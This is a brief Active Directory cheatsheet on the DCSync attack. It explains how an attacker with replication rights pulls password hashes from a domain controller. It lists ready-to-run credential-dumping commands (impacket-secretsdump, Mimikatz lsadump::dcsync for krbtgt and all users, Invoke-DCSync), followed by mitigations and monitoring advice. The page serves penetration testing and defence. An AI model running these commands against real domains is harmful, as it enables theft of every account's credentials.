Dcsync
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
DCSync is a powerful AD attack that allows an attacker with appropriate privileges (Domain Admin, Enterprise Admin, or specific replication rights) to impersonate a domain controller and replicate user credentials from the domain.
The attack uses the MS-DRSR (Directory Replication Service) protocol to request replication of password hashes from the domain controller.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Dcsync:
impacket-secretsdump -just-dc domain.local/user:password@10.10.10.10impacket-secretsdump -just-dc-user administrator domain.local/user:password@10.10.10.10lsadump::dcsync /domain:domain.local /user:krbtgt (Mimikatz)lsadump::dcsync /domain:domain.local /all (Mimikatz)Invoke-DCSync -PWDumpFormat (PowerShell)Tools & Techniques
Recommended tools for Dcsync:
- Impacket secretsdump: remote DCSync via DRSUAPI
- Mimikatz lsadump::dcsync: local DCSync execution
- PowerView/Invoke-DCSync: PowerShell-based DCSync
- Requires: Replication-Get-Changes-All privilege
Prevention & Mitigation
Security recommendations to prevent Dcsync:
- Restrict who has Replication-Get-Changes-All rights
- Use privileged access workstations (PAWs) for admin accounts
- Enable Advanced Audit Policy for directory service access
- Monitor Event ID 4662 (Replication rights usage)
- Implement just-in-time (JIT) administration models
- Regularly review and remove excessive replication permissions
References
Additional resources: